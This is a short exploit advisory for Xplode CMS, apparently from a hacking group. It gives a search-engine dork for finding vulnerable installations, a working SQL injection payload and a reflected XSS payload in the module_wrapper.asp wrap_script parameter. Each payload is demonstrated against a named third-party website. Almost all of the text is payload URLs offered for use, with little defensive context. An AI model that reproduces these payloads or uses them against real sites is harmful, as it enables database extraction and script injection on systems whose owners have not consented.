Xplode CMS XSS / SQL Injection

`#---------------------------------------------------------------------------------------------  
# scriptname: Xplode Cms   
#  
# Xplode Multiple XSS/SQL Injection Vulnerabilities  
#  
# Author: PLATEN  
#  
# contact: PLATEN.Secure[at]Gmail.com  
#  
# web: Www.ata-turk.tk & www.deltahacking.net  
#  
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d   
#---------------------------------------------------------------------------------------------  
  
dork: "Powered by Xplode CMS"  
  
#----------------------------------------------------------------------------------------------  
  
===[ SQL ]===  
  
  
http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]  
  
example & demo:  
  
http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--  
  
  
#----------------------------------------------------------------------------------------------  
  
===[ XSS ]===  
  
  
http://127.0.0.1/module_wrapper.asp?wrap_script=[xss code]  
  
example & demo:  
  
http://www.snowawards.co.uk:80/module_wrapper.asp?wrap_script=modules%2FSearch+results%2Fsearch%2Easp&SearchType=all&SearchString=>"><ScRiPt%20%0a%0d>alert(400191613824)%3B</ScRiPt>  
  
#----------------------------------------------------------------------------------------------  
  
`